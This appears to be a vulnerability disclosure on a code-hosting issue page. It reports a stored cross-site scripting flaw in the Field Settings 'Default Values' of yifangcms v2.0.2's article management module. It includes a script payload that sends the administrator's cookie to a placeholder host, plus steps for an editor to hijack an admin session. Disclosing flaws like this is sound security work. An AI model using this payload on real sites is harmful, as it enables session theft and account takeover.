yifangcms v2.0.2 contains a Cross-Site Scripting(XSS) vulnerability in the article management module.

In the article management module of the Yifangcms backend, click "Field Settings", and input the JS code in the "Default Values" section. Then save and submit, a window will pop up.

![输入图片说明](https://foruda.gitee.com/images/1745578985088145362/d03f156a_13375781.png "截屏2025-04-25 18.06.59.png")

![输入图片说明](https://foruda.gitee.com/images/1745579011300808603/71b421de_13375781.png "截屏2025-04-25 18.07.49.png")

This means that, as an editor who only has the permission for article management, we can input `<script>location.href="http://ip:port/?cookie="+document.cookie</script>`

![输入图片说明](https://foruda.gitee.com/images/1745579043148397839/f7d82592_13375781.png "截屏2025-04-25 18.12.19.png")

Wait for the administrator to log in to the backend, click on "Article Management" ->"Field Settings", and then we will receive the administrator's cookie.

![输入图片说明](https://foruda.gitee.com/images/1745579069158699135/93e466f9_13375781.png "截屏2025-04-25 18.14.55.png")

![输入图片说明](https://foruda.gitee.com/images/1745579089478683597/9cedc8d5_13375781.png "截屏2025-04-25 18.14.10.png")

亿坊软件/亿坊CMS-企业级建站软件

Content Risk Flag

Comments (0)

亿坊软件/亿坊CMS-企业级建站软件 .gitee-modal { width: 500px !important; }

Content Risk Flag